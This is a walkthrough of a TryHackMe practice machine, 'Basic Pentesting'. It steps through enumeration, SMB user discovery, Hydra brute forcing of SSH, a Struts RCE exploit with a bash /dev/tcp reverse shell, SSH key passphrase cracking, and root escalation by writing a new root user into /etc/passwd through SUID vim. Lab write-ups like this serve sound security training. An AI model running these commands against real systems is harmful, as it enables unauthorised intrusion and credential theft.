Basic Pentesting - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on enumeration, web directory discovery, SMB user enumeration, SSH brute forcing, and privilege escalation via a cracked SSH key.

Room URL: https://tryhackme.com/room/basicpentestingjt

Difficulty: Easy

Tools & Techniques Used

• Nmap
• Gobuster
• smbclient / enum4linux
• Hydra
• Searchsploit
• wget / Python HTTP server
• linPEAS
• ssh2john + John the Ripper
• SSH
• vim (SUID exploitation)

Step-by-Step Walkthrough

1. Enumeration

(Optional) Add host entry:

echo "<TARGET_IP> basic.thm" | sudo tee -a /etc/hosts

Nmap scan:

nmap -sC -sV -oN nmap.txt <TARGET_IP>

Typical findings include:

2. Web Enumeration

Check the site source. A useful hint appears in HTML comments:

Bruteforce directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40

Found: /development

Inside, read dev.txt and note:

• Mentions Struts
• Mentions SMB has been configured
• Mentions version 2.5.12

3. SMB Enumeration (Users)

Method A: Anonymous SMB Access

Check for anonymous SMB shares:

smbclient ///<TARGET_IP>/Anonymous
# Press Enter for empty password

Inside, you may find staff.txt with hints about users Jan and Kay.

Method B: enum4linux

Enumerate SMB to find valid users:

enum4linux -a <TARGET_IP>

Found users:

• jan
• kay

4. SSH Brute Force (jan)

Use Hydra against SSH. Example:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<TARGET_IP>

Result: A valid password for jan (redacted).

5. Initial Access

Method A: SSH with Brute-Forced Credentials

SSH in as jan:

ssh jan@<TARGET_IP>

Method B: Apache Struts RCE (CVE-2017-9805)

The dev.txt file mentions Struts version 2.5.12. This version is vulnerable to RCE.

Search for the exploit:

searchsploit "struts 2.5.12"
# Found: Apache Struts 2.5 < 2.5.12 - REST Plugin XStream RCE (42627.py)

Copy and run the exploit:

searchsploit -m 42627
python3 42627.py http://<TARGET_IP>:8080/struts2-rest-showcase-2.5.12/orders/3 "id"

For a reverse shell:

# Start listener
nc -lvnp 4444

# Run exploit with reverse shell payload
python3 42627.py http://<TARGET_IP>:8080/struts2-rest-showcase-2.5.12/orders/3 "bash -i >& /dev/tcp/<YOUR_IP>/4444 0>&1"

This gives you a shell as tomcat9 user.

6. Local Enumeration (linPEAS)

Host linPEAS.sh from your machine:

python3 -m http.server 80

Download and run it on the target:

wget http://<YOUR_IP>/linPEAS.sh
chmod +x linPEAS.sh
./linPEAS.sh

A key discovery is an SSH private key in another user’s home, e.g.:

/home/kay/.ssh/id_rsa

Copy id_rsa to your machine for offline cracking.

7. Crack kay’s SSH Key Passphrase

Convert the key to a John hash and crack it with rockyou.txt:

/usr/share/john/ssh2john.py kay_id_rsa > kay_id_rsa.hash
john --wordlist=/usr/share/wordlists/rockyou.txt kay_id_rsa.hash

Result: Passphrase recovered (redacted).

8. Login as kay

Fix key permissions and SSH using the key:

chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay@<TARGET_IP>

9. Privilege Escalation

Method A: sudo bash (as kay)

If logged in as kay, escalation is simply:

sudo bash

Method B: SUID vim.basic

linPEAS may reveal a SUID binary:

-rwsr-xr-x 1 root root 2.4M Nov 24 2016 /usr/bin/vim.basic

Exploit this to edit /etc/passwd and add a root user:

Step 1: Generate a password hash:

openssl passwd -1 -salt hacker password123
# Output: $1$hacker$BtrWzHlP...

Step 2: Use vim.basic to edit /etc/passwd:

/usr/bin/vim.basic /etc/passwd

Step 3: Add this line at the end:

hacker:$1$hacker$BtrWzHlP...:0:0:root:/root:/bin/bash

Step 4: Save and switch to the new user:

su hacker
# Enter: password123

You now have root access.

Notes

• Don’t leave cracked passwords/flags in your published notes. Redact them.
• enum4linux is often the fastest path to real usernames on SMB targets.
• Cracking SSH keys (ssh2john + john) is a common CTF pattern.